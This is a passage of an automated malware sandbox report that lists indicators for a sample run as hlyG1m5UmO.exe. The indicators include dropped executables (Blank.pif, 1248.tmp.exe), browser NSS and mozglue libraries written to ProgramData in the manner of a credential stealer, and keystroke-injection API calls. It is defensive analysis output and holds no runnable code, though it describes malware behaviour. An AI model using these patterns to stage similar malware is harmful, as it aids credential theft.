                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_004118A6 push ecx; ret 15_2_004118B9
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00410EC3 push ecx; ret 15_2_00410ED6
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_0041B035 push ecx; ret 16_2_0041B048
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_0040020D pushfd ; iretd 16_2_00400211
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C16B536 push ecx; ret 16_2_6C16B549
                    Source: ScreenUpdateSync[1].exe.15.drStatic PE information: section name: .text entropy: 7.874217140774513
                    Source: 1248.tmp.exe.15.drStatic PE information: section name: .text entropy: 7.874217140774513

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with a suspicious file extension
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\464151\Blank.pifJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifFile created: C:\Users\user\AppData\Local\Temp\1248.tmp.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\seed[1].exeJump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\464151\Blank.pifJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002E59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,15_2_002E59B3
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00275EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,15_2_00275EDA
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002833B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_002833B7
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
